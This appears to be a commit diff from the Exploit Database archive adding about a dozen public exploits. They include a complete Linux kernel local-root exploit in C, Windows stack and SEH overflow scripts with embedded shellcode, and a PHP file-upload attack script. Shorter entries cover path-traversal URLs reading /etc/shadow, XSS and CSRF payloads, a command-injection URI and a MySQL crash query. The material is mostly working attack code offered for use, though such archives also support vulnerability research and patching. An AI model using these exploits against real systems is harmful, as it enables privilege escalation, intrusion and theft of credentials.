DB: 2015-10-04

11 new exploits

files.csv

@@ -34668,5 +34668,16 @@ id,file,description,date,author,platform,type,port
 38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0
 38380,platforms/windows/webapps/38380.txt,"FTGate 7 - CSRF Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0
 38381,platforms/windows/local/38381.py,"WinRar < 5.30 beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0
+38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - .asx Stack Overflow",2015-10-02,ex_ptr,windows,local,0
 38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200
 38384,platforms/windows/remote/38384.txt,"Avast Antivirus X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0
+38385,platforms/php/webapps/38385.txt,"KindEditor Multiple Remote File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0
+38386,platforms/php/webapps/38386.txt,"PHPBoost Arbitrary File Upload and Information Disclosure Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0
+38387,platforms/multiple/remote/38387.txt,"RubyGems fastreader 'entry_controller.rb' Remote Command Execution Vulnerability",2013-03-12,"Larry W. Cashdollar",multiple,remote,0
+38388,platforms/windows/remote/38388.txt,"QlikView '.qvw' File Remote Integer Overflow Vulnerability",2013-03-13,"A. Antukh",windows,remote,0
+38389,platforms/hardware/remote/38389.txt,"Cisco Video Surveillance Operations Manager Multiple Security Vulnerabilities",2013-03-13,b.saleh,hardware,remote,0
+38390,platforms/linux/local/38390.c,"Linux Kernel 3.3.5 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation Vulnerability",2013-03-13,"Sebastian Krahmer",linux,local,0
+38391,platforms/php/webapps/38391.txt,"Petite Annonce Cross Site Scripting Vulnerability",2013-03-14,Metropolis,php,webapps,0
+38392,platforms/linux/dos/38392.txt,"MySQL and MariaDB Geometry Query Denial Of Service Vulnerability",2013-03-07,"Alyssa Milburn",linux,dos,0
+38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin Cross Site Request Forgery Vulnerability",2013-03-19,m3tamantra,php,webapps,0
+38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard '.PLF' File Remote Buffer Overflow Vulnerability",2013-03-19,metacom,windows,remote,0

platforms/hardware/remote/38389.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/58476/info
+
+Cisco Video Surveillance Operations Manager is prone to multiple security vulnerabilities, including:
+
+1. Multiple local file-include vulnerabilities
+2. A security-bypass vulnerability
+3. Multiple cross-site scripting vulnerabilities
+
+An attacker may leverage these issues to bypass certain security restrictions to perform unauthorized actions, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the affected application.
+
+Cisco Video Surveillance Operations Manager 6.3.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
+http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
+http://www.example.com/monitor/logselect.php
+http://www.example.com/broadware.jsp
+http://www.example.com/vsom/index.php/"/title><script>alert("ciscoxss");</script> 

platforms/linux/dos/38392.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/58511/info
+
+MySQL and MariaDB are prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the database, denying access to legitimate users. 
+
+"select astext(0x0100000000030000000100000000000010);" 

platforms/linux/local/38390.c

@@ -0,0 +1,178 @@
+source: http://www.securityfocus.com/bid/58478/info
+
+Linux kernel is prone to a local privilege-escalation vulnerability.
+
+Local attackers can exploit this issue to gain kernel privileges, which will aid in further attacks. 
+
+/* clown-newuser.c -- CLONE_NEWUSER kernel root PoC
+ *
+ * Dedicated to: Locke Locke Locke Locke Locke Locke Locke!
+ *
+ * This exploit was made on the 13.3.13.
+ *
+ * (C) 2013 Sebastian Krahmer
+ *
+ * We are so 90's, but we do 2013 xSports.
+ *
+ * Must be compiled static:
+ *
+ * stealth@linux-czfh:~> cc -Wall clown-newuser.c -static
+ * stealth@linux-czfh:~> ./a.out
+ * [**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian 
+Krahmer
+ *
+ * [+] Found myself: '/home/stealth/a.out'
+ * [*] Parent waiting for boomsh to appear ...
+ * [*] Setting up chroot ...
+ * [+] Done.
+ * [*] Cloning evil child ...
+ * [+] Done.
+ * [*] Creating UID mapping ...
+ * [+] Done.
+ * [+] Yay! euid=0 uid=1000
+ * linux-czfh:/home/stealth # grep bin /etc/shadow
+ * bin:*:15288::::::
+ * linux-czfh:/home/stealth #
+ *
+ */
+#define _GNU_SOURCE
+#include <sched.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <string.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+
+int go[2];
+char child_stack[1<<20];
+extern char **environ;
+
+
+void die(const char *msg)
+{
+	perror(msg);
+	exit(errno);
+}
+
+
+int child(void *arg)
+{
+	char c;
+
+	close(go[1]);
+	read(go[0], &c, 1);
+
+	setuid(0);
+
+	/* this will also affect the parent, but the parent
+	 * has the init_user_ns, so it will start suid with real uid 0.
+	 */
+	if (chdir("chroot") < 0)
+		die("[-] chdir");
+	if (chroot(".") < 0)
+		die("[-] chroot");
+
+	return 0;
+}
+
+
+
+int setup_chroot(const char *me)
+{
+	mkdir("chroot", 0755);
+	mkdir("chroot/lib64", 0755);
+	mkdir("chroot/bin", 0755);
+
+	if (link(me, "chroot/lib64/ld-linux-x86-64.so.2") < 0)
+		die("[-] link");
+	if (link("/bin/su", "chroot/bin/su") < 0)
+		die("[-] link");
+	return 0;
+}
+
+
+int main(int argc, char *argv[])
+{
+	char *su[] = {"/bin/su", NULL};
+	char *sh[] = {"/bin/bash", NULL};
+	char me[256], *mee[] = {me, "1", NULL};
+	char uidmap[128], map_file[128];
+	pid_t pid;
+	struct stat st;
+	int fd;
+
+
+	if (geteuid() == 0 && argc == 1) {
+		/* this will run inside chroot, started as the ld.so 
+from
+		 * su process
+		 */
+		printf("[+] Yay! euid=%d uid=%d\n", geteuid(), 
+getuid());
+		chown("lib64/ld-linux-x86-64.so.2", 0, 0);
+		chmod("lib64/ld-linux-x86-64.so.2", 04755);
+		exit(0);
+	} else if (geteuid() == 0) {
+		/* this will run outside */
+		setuid(0);
+		execve(*sh, sh, environ);
+		die("[-] execve");
+	}
+
+	printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 
+Sebastian Krahmer\n\n");
+
+	memset(me, 0, sizeof(me));
+	readlink("/proc/self/exe", me, sizeof(me) - 1);
+	printf("[+] Found myself: '%s'\n", me);
+
+	if (fork() > 0) {
+		printf("[*] Parent waiting for boomsh to appear ...\n");
+		for (;;) {
+			stat(me, &st);
+			if (st.st_uid == 0)
+				break;
+			usleep(1000);
+		}
+		execve(me, mee, environ);
+		die("[-] execve");
+	}
+
+	printf("[*] Setting up chroot ...\n");
+	setup_chroot(me);
+	printf("[+] Done.\n[*] Cloning evil child ...\n");
+
+	if (pipe(go) < 0)
+		die("[-] pipe");
+
+	pid = clone(child, child_stack + sizeof(child_stack),
+	            CLONE_NEWUSER|CLONE_FS|SIGCHLD, NULL);
+	if (pid == -1)
+		die("[-] clone");
+
+	printf("[+] Done.\n[*] Creating UID mapping ...\n");
+
+	snprintf(map_file, sizeof(map_file), "/proc/%d/uid_map", pid);
+	if ((fd = open(map_file, O_RDWR)) < 0)
+		die("[-] open");
+	snprintf(uidmap, sizeof(uidmap), "0 %d 1\n", getuid());
+	if (write(fd, uidmap, strlen(uidmap)) < 0)
+		die("[-] write");
+	close(fd);
+	printf("[+] Done.\n");
+
+	close(go[0]);
+	write(go[1], "X", 1);
+
+	waitpid(pid, NULL, 0);
+	execve(*su, su, NULL);
+	die("[-] execve");
+	return -1;
+}
+
+

platforms/multiple/remote/38387.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/58450/info
+
+fastreader is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
+
+fastreader 1.0.8 is affected; other versions may also be vulnerable. 
+
+The following example URI is available:
+
+http://www.g;id;.com 

platforms/php/webapps/38385.txt

@@ -0,0 +1,51 @@
+source: http://www.securityfocus.com/bid/58431/info
+
+KindEditor is prone to multiple remote file-upload vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Attackers can exploit these issues to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+KindEditor 4.1.5 is vulnerable; other versions may also be affected. 
+
+<?php
+ 
+$uploadfile="KedAns.txt";
+$ch = curl_init("http://www.example.com/kindeditor/php/upload_json.php?dir=file");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+       array(&#039;imgFile&#039;=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+ 
+?>
+
+# KindEditor (ASP,ASP.NET,JSP,PHP) _JSON Uploader :
+--------------------------------------------------
+
+<html><head>
+<title>Uploader By KedAns-Dz</title>
+<script src="http://www.example.com/kindeditor/kindeditor-min.js"></script>
+<script>
+KindEditor.ready(function(K) {
+var uploadbutton = K.uploadbutton({
+button : K(&#039;#uploadButton&#039;)[0],
+fieldName : &#039;imgFile&#039;,
+url : &#039;http://www.example.com/kindeditor/php/upload_json.asp?dir=file&#039;,
+afterUpload : function(data) {
+if (data.error === 0) {
+var url = K.formatUrl(data.url, &#039;absolute&#039;);
+K(&#039;#url&#039;).val(url);}
+},
+});
+uploadbutton.fileBox.change(function(e) {
+uploadbutton.submit();
+});
+});
+</script></head><body>
+<div class="upload">
+<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
+<input type="button" id="uploadButton" value="Upload" />
+</div>
+</body>
+</html>

platforms/php/webapps/38386.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58432/info
+
+PHPBoost is prone to an information disclosure vulnerability and an arbitrary file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit these issues to upload arbitrary files in the context of the web server process or gain access to sensitive information that may aid in further attacks.
+
+PHPBoost 4.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/phpboost/user/?url=/../../KedAns 

platforms/php/webapps/38391.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/58508/info
+
+Petite Annonce is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/[path]/annonce/moteur-prix.php?categoriemoteur=1"><script>alert(31337);</script> 

platforms/php/webapps/38393.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58599/info
+
+The Occasions plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
+
+Occasions 1.0.4 is vulnerable; other versions may also be affected. 
+
+<html> <head><title>CSRF Occasions</title></head> <body> <!-- www.example.com:9001/wordpress --> <form action="http://127.0.0.1:9001/wordpress/wp-admin/options-general.php?page=occasions/occasions.php" method="POST"> <input type="hidden" name="action" value="saveoccasions" /> <input type="hidden" name="nodes[]" value="1" /> <input type="hidden" name="occ_title1" value="CSRF Vulnerability" /> <input type="hidden" name="occ_startdate1" value="18.03." /> <input type="hidden" name="occ_enddate1" value="28.03." /> <input type="hidden" name="occ_type1" value="1" /> <input type="hidden" name="occ_content1" value="<script>alert(1)</script>" /> <script>document.forms[0].submit();</script> </form> </body> </html> 

platforms/windows/local/38382.py

@@ -0,0 +1,34 @@
+'''
+# Exploit Title: ASX to MP3 Converter 1.82.50 Stack Overflow
+# Date: 2 Oct 2015
+# Exploit Author: ex_ptr
+# Vendor Homepage: http://mini-stream.net
+# Software Link: http://www.topvideopro.com/download/ASXtoMP3Converter.exe
+http://www.topvideopro.com/mp3wav/asx-mp3.htm
+# Version: 1.82.50
+# Tested on: Windows XP SP3
+'''
+
+import struct
+filename = "exploit.asx"
+
+dummy = "A"*0x104
+EIP   = struct.pack('<I', 0x76af3adc)
+FFFF  = "\xFF\xFF\xFF\xFF"
+NOP   = "\x90"*4
+Shell = ("\x31\xc9\xbd\x90\xb7\x29\xb8\xd9\xf7\xd9\x74\x24\xf4\xb1\x1e"
+		 "\x58\x31\x68\x11\x03\x68\x11\x83\xe8\x6c\x55\xdc\x44\x64\xde"
+		 "\x1f\xb5\x74\x54\x5a\x89\xff\x16\x60\x89\xfe\x09\xe1\x26\x18"
+		 "\x5d\xa9\x98\x19\x8a\x1f\x52\x2d\xc7\xa1\x8a\x7c\x17\x38\xfe"
+		 "\xfa\x57\x4f\xf8\xc3\x92\xbd\x07\x01\xc9\x4a\x3c\xd1\x2a\xb7"
+		 "\x36\x3c\xb9\xe8\x9c\xbf\x55\x70\x56\xb3\xe2\xf6\x37\xd7\xf5"
+		 "\xe3\x43\xfb\x7e\xf2\xb8\x8a\xdd\xd1\x3a\x4f\x82\x28\xb5\x2f"
+		 "\x6b\x2f\xb2\xe9\xa3\x24\x84\xf9\x48\x4a\x19\xac\xc4\xc3\x29"
+		 "\x27\x22\x90\xea\x5d\x83\xff\x94\x79\xc1\x73\x01\xe1\xf8\xfe"
+		 "\xdf\x46\xfa\x18\xbc\x09\x68\x84\x43")
+
+exploit = dummy + EIP + FFFF + NOP + Shell
+
+f = open(filename,'wb')
+f.write(exploit)
+f.close()

platforms/windows/remote/38388.txt

@@ -0,0 +1,74 @@
+source: http://www.securityfocus.com/bid/58463/info
+
+QlikView is prone to a remote integer-overflow vulnerability.
+
+Successful attacks will allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.
+
+QlikView 11.00 SR2 is vulnerable; other versions may also be affected. 
+
+Vulnerability details:
+----------------------
+The .qvw file is divided into several sections with a specified delimiter.
+Among others, there is a parameter which is responsible for defining the
+section length. On the hex listing below it's the DWORD A4 00 00 00 (address
+315EF)
+
+000315B0:  00 00 01 00-00 00 0E 23-23 23 23 23-23 23 23 23
+000315C0:  23 23 23 23-23 01 2E 00-00 00 00 00-00 00 00 00
+000315D0:  00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 03
+000315E0:  00 00 00 00-00 00 00 90-02 00 00 00-00 04 00 A4
+000315F0:  00 00 00 78-9C 3D CC CB-4A 02 50 14-86 D1 1F 47
+
+If by any reasons the value is bigger than the actual size of the section,
+an error is handled by a C++ EH and a message "Document failed to load" is
+shown. The check condition can be seen here:
+
+.text:00D6BD66                 mov     eax, [edi+28h]
+.text:00D6BD69                 mov     ebx, [eax]      ; here is the length parameter
+.text:00D6BD6B                 add     eax, 4
+.text:00D6BD6E                 mov     [edi+28h], eax
+.text:00D6BD71                 cmp     ebx, [ebp+var_14]
+.text:00D6BD74                 jg      loc_D6BBAC      ; check if the parameter value 
+                                                         is bigger than actual length
+
+However, the comparison operates with a signed number and doesn't check if it's
+less than zero. In other words, if an attacker supplies a DWORD bigger than
+0x80000000, the jump will not be taken (as the number will be considered as 
+negative), causing an integer overflow. After that, the length parameter is used 
+as the DstSize argument to the CArchive::Read function:
+
+.text:00D6BD7A                 mov     eax, [ebp+Dst]
+.text:00D6BD7D                 push    ebx             ; DstSize
+.text:00D6BD7E                 push    eax             ; Dst
+.text:00D6BD7F                 mov     ecx, edi
+.text:00D6BD81                 call    ?Read () CArchive@@QAEIPAXI () Z ; CArchive::Read(void *,uint)
+
+A large amount of data is read. It is used later to fill the created Archive
+whose size is 0x8000:
+ 
+.text:00B26207                 push    0
+.text:00B26209                 push    8000h
+.text:00B2620E                 push    1
+.text:00B26210                 lea     eax, [ebp+var_60]
+.text:00B26213                 push    eax
+.text:00B26214                 lea     ecx, [ebp+var_A8]
+.text:00B2621A                 call    ??0CArchive@@QAE () PAVCFile@@IHPAX () Z ; 
+                                                     CArchive::CArchive(CFile *,uint,int,void *)
+
+This results in the controlled address being overwritten with the controlled
+value.
+
+.text:009F3092                 mov     ecx, [esi]
+.text:009F3094                 mov     edx, [esi+4]
+.text:009F3097                 mov     [ecx+4], edx    ; here the error occurs;
+.text:009F3097                                         ; trying to write at non-existing address
+
+An extract from a debugger with the occurence of the error is presented below.
+
+eax=04735f14 ebx=00000000 ecx=bbbbbbb7 edx=aaaaaaa6 esi=04b2fbc0 edi=04735f10
+eip=01723097 esp=003527f8 ebp=00352818 iopl=0         nv up ei pl nz ac pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
+Qv+0x5f3097:
+01723097 895104          mov     dword ptr [ecx+4],edx ds:002b:bbbbbbbb=????????
+
+

platforms/windows/remote/38394.py

@@ -0,0 +1,48 @@
+source: http://www.securityfocus.com/bid/58624/info
+
+BlazeVideo HDTV Player Standard is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
+
+BlazeVideo HDTV Player Standard 6.6.0.2 is vulnerable; other versions may also be affected. 
+
+# Exploit Title:BlazeVideo HDTV Player Standard 6.6.0.2 SEH Buffer Overflow
+# Date: 19-03-2013
+# Exploit Author: metacom
+# RST
+# Vendor Homepage: http://www.blazevideo.com/hdtv-player/
+# Download version 6.6.0.2: www.blazevideo.com/download.php?product=blazevideo-hdtv-std
+# Version: BlazeVideo HDTV Player Standard 6.6.0.2
+# Tested on: Windows 7 German
+
+filename="poc.PLF"
+
+
+
+junk = "http://"+ "\x41" * 601 
+nseh = "\xEB\x06\x90\x90"
+seh  = "\x5F\x17\x60\x61"  #6160175F \EPG.dll
+nops = "\x90" * 20
+#windows/exec CMD=calc.exe bad \x00\x0a\x1a  
+shellcode= ("\xb8\xaf\x8c\x07\x94\xda\xcd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
+"\x33\x31\x42\x12\x83\xea\xfc\x03\xed\x82\xe5\x61\x0d\x72\x60"
+"\x89\xed\x83\x13\x03\x08\xb2\x01\x77\x59\xe7\x95\xf3\x0f\x04"
+"\x5d\x51\xbb\x9f\x13\x7e\xcc\x28\x99\x58\xe3\xa9\x2f\x65\xaf"
+"\x6a\x31\x19\xad\xbe\x91\x20\x7e\xb3\xd0\x65\x62\x3c\x80\x3e"
+"\xe9\xef\x35\x4a\xaf\x33\x37\x9c\xa4\x0c\x4f\x99\x7a\xf8\xe5"
+"\xa0\xaa\x51\x71\xea\x52\xd9\xdd\xcb\x63\x0e\x3e\x37\x2a\x3b"
+"\xf5\xc3\xad\xed\xc7\x2c\x9c\xd1\x84\x12\x11\xdc\xd5\x53\x95"
+"\x3f\xa0\xaf\xe6\xc2\xb3\x6b\x95\x18\x31\x6e\x3d\xea\xe1\x4a"
+"\xbc\x3f\x77\x18\xb2\xf4\xf3\x46\xd6\x0b\xd7\xfc\xe2\x80\xd6"
+"\xd2\x63\xd2\xfc\xf6\x28\x80\x9d\xaf\x94\x67\xa1\xb0\x70\xd7"
+"\x07\xba\x92\x0c\x31\xe1\xf8\xd3\xb3\x9f\x45\xd3\xcb\x9f\xe5"
+"\xbc\xfa\x14\x6a\xba\x02\xff\xcf\x34\x49\xa2\x79\xdd\x14\x36"
+"\x38\x80\xa6\xec\x7e\xbd\x24\x05\xfe\x3a\x34\x6c\xfb\x07\xf2"
+"\x9c\x71\x17\x97\xa2\x26\x18\xb2\xc0\xa9\x8a\x5e\x29\x4c\x2b"
+"\xc4\x35")
+
+f = open(filename,"wb")
+f.write(junk+nseh+seh+nops+shellcode)
+f.close()
+print("Finish")
+